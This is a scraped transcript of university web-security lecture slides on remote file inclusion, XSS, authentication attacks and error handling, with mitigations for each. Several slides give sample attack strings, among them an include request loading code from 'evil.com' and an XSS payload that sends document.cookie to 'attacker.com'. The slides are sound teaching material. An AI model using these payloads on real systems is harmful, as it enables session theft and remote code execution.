GET /include.php?server_root="> GET /include.php?server_root=">

Presentation is loading. Please wait.

Presentation is loading. Please wait.

CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Web Security.

Published byAntonia Hawkins Modified over 8 years ago

Similar presentations

Presentation on theme: "CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Web Security."— Presentation transcript:

1 CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Web Security

2 CIT 380: Securing Computer SystemsSlide #2 Insecure Remote File Inclusion Insecure remote file inclusion vulnerabilities allow an attack to trick the application into executing code provided by the attacker on another site. Dynamic code –Includes in PHP, Java,.NET –DTDs for XML documents Key Idea –Attacker controls pathname for inclusion.

3 CIT 380: Securing Computer SystemsSlide #3 PHP Remote Inclusion Flaw A PHP product uses "require" or "include" statements, or equivalent statements, that use attacker-controlled data to identify code or HTML to be directly processed by the PHP interpreter before inclusion in the script. <?php // index.php include('config.php'); include('include.php'); // Script body ?> <?php //config.php $server_root = '/my/path'; ?> <?php //include.php include($server_root. '/someotherfile.php'); ?> GET /include.php?server_root=http://evil.com/command.txt

4 CIT 380: Securing Computer SystemsSlide #4 Mitigating Remote File Inclusion 1.Turn off remote file inclusion. 2.Do not run code from uploaded files. 3.Do not use user-supplied paths. 4.Validate all paths before loading code.

5 CIT 380: Securing Computer SystemsSlide #5 Unvalidated Input Unvalidated input is an architecture flaw. –Individual input-related bugs are easy to fix. –How do you defend against the general problem of input-based attacks? Key Ideas –Application needs to validate all input. –Input validation needs to be part of design.

6 CIT 380: Securing Computer SystemsSlide #6 Input Validation Solutions All input must be validated. Input must be validated on the server. Use a standard set of validation rules. Reject all input that isn’t in your whitelist. –Blacklists can miss bad inputs. –Input repairs can produce bad input.

7 CIT 380: Securing Computer SystemsSlide #7 Authentication Authentication is the process of determining a user’s identity. Key Ideas –HTTP is a stateless protocol. –Every request must be authenticated. –Use username/password on first request. –Use session IDs on subsequent queries.

8 CIT 380: Securing Computer SystemsSlide #8 Authentication Attacks Sniffing passwords Guessing passwords Identity management attacks Replay attacks Session ID fixation Session ID guessing

9 CIT 380: Securing Computer SystemsSlide #9 Identity Management Attacks Auth requires identity management –User registration –Password changes and resets Mitigations –Use CAPTCHAs to protect registration. –Don’t use easy to guess secret questions. –Don’t allow attacker to reset e-mail address that new password is sent to.

10 CIT 380: Securing Computer SystemsSlide #10 Session ID Guessing Do session IDs show a pattern? –How does changing username change ID? –How do session IDs change with time? Brute forcing session IDs –Use program to try 1000s of session IDs. Mitigating guessing attacks –Use a large key space (128+ bits). –Use a cryptographically random algorithm.

11 CIT 380: Securing Computer SystemsSlide #11 Mitigating Authentication Attacks Use SSL to prevent sniffing attacks. Require strong passwords. Use secure identity management. Use a secure session ID mechanism. –IDs chosen at random from large space. –Regenerate session IDs with each request. –Expire session IDs in short time.

12 CIT 380: Securing Computer SystemsSlide #12 Access Control Access control determines which users have access to which system resources. Levels of access control –Site –URL –Function –Function(parameters) –Data

13 CIT 380: Securing Computer SystemsSlide #13 Mitigating Broken Access Control 1.Check every access. 2.Use whitelist model at every layer. 3.Do not rely on client-level access control. 4.Do not rely on security through obscurity.

14 CIT 380: Securing Computer SystemsSlide #14 Cross-Site Scripting (XSS) Attacker causes a legitimate web server to send user executable content (Javascript, Flash ActiveScript) of attacker’s choosing. XSS used to obtain session ID for –Bank site (transfer money to attacker) –Shopping site (buy goods for attacker) –E-mail Key ideas –Attacker sends malicious code to server. –Victim’s browser loads code from server and runs it.

15 CIT 380: Securing Computer SystemsSlide #15 XSS Attacks MySpace worm (October 2005) –When someone viewed Samy’s profile: Set him as friend of viewer. Incorporated code in viewer’s profile. Paypal (2006) –XSS redirect used to steal money from Paypal users in a phishing scam. BBC, CBS (2006) –By following XSS link from securitylab.ru, you could read an apparently valid story on the BBC or CBS site claiming that Bush appointed a 9-year old as head of the Information Security department.

16 CIT 380: Securing Computer SystemsSlide #16 Stored XSS –Injected script stored in comment, message, etc. –Requires ability to insert malicious code into web documents (comments, reviews, etc.) –Persistent until message deleted.

17 CIT 380: Securing Computer SystemsSlide #17 Reflected XSS –Injected script returned by one-time message. –Requires tricking user to click on link. –Non-persistent. Only works when user clicks.

18 CIT 380: Securing Computer SystemsSlide #18 Why does XSS Work? Same-Origin Policy –Browser only allows Javascript from site X to access cookies and other data from site X. –Attacker needs to make attack come from site X. Vulnerable Server Program –Any program that returns user input without filtering out dangerous code.

19 CIT 380: Securing Computer SystemsSlide #19 Anatomy of an XSS Attack 1. Login 2. Cookie Web Server 3. XSS Attack Attacker User 4. User clicks on XSS link. 5. XSS URL 7. Browser runs injected code. Evil site saves ID. 8. Attacker hijacks user session. 6. Page with injected code.

20 CIT 380: Securing Computer SystemsSlide #20 XSS URL Examples http://www.microsoft.com/education/?ID=MCTN&target =http://www.microsoft.com/education/?ID=MCTN&tar get="> alert(document.cookie) http://hotwired.lycos.com/webmonkey/00/18/index3a_ page2.html?tw= alert(‘Test’); http://www.shopnbc.com/listing.asp?qu= aler t(document.cookie) &frompage=4&page=1&ct =VVTV&mh=0&sh=0&RN=1 http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_sea rch_exe?search_text=_%22%3E%3Cscript%3Ealert%28d ocument.cookie%29%3C%2Fscript%3E

21 March 15, 2008SIGCSE Exploiting the Vulnerability 1.User logins in and is issued a cookie 2.Attacker feed the URL to user https://example.com/error.php?message= var+i=new+Image;+i.src=“http://attacker.com/”%2bdocument.cookie;

22 March 15, 2008SIGCSE Exploiting the Vulnerability 1.User logins in and is issued a cookie 2.Attacker feed the URL to user https://example.com/error.php?message= var+i=new+Image;+i.src=“http://attacker.com/”%2bdocument.cookie;

23 CIT 380: Securing Computer SystemsSlide #23 Mitigating XSS 1.Disallow HTML input 2.Allow only safe HTML tags 3.Filter output Replace HTML special characters in output ex: replace with > also replace (, ), #, & 4.Tagged cookies Include IP address in cookie and only allow access to original IP address that cookie was created for. 5.Client: disable Javascript Use NoScript extension for Firefox.

24 CIT 380: Securing Computer SystemsSlide #24 Improper Error Handling Applications can unintentionally leak information about configuration, architecture, or sensitive data when handling errors improperly. Errors can provide too much data –Stack traces –SQL statements –Subsystem errors –User typos, such as passwords.

25 CIT 380: Securing Computer SystemsSlide #25 Example of Improper Error Handling mySQL error with query SELECT COUNT(*) FROM nucleus_comment as c WHERE c.citem=90: Can't open file: 'nucleus_comment.MYI' (errno: 145) Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/exalt2/public_html/username/nucle us/libs/COMMENTS.php on line 124

26 CIT 380: Securing Computer SystemsSlide #26 Mitigating Improper Error Handling 1.Catch all exceptions. 2.Check all error codes. 3.Wrap application with catch-all handler. 4.Send user-friendly message to user. 5.Store details for debugging in log files. 6.Don’t log passwords or other sensitive data.

Download ppt "CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Web Security."

Similar presentations

Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
Cross Site Scripting (XSS)

Cross Site Scripting (XSS)
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
Attacking Authentication and Authorization CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University

Attacking Authentication and Authorization CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University
CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.

CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.

It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.

Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.

Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.

Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.

WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.
Designing Security In Web Applications Andrew Tomkowiak 10/8/2013 UW-Platteville Software Engineering Department

Designing Security In Web Applications Andrew Tomkowiak 10/8/2013 UW-Platteville Software Engineering Department
Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 

Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 
Web-based Document Management System By Group 3 Xinyi Dong Matthew Downs Joshua Ferguson Sriram Gopinath Sayan Kole.

Web-based Document Management System By Group 3 Xinyi Dong Matthew Downs Joshua Ferguson Sriram Gopinath Sayan Kole.
PHP Security.

PHP Security.
OWASP Zed Attack Proxy Project Lead

OWASP Zed Attack Proxy Project Lead

Similar presentations

Ads by Google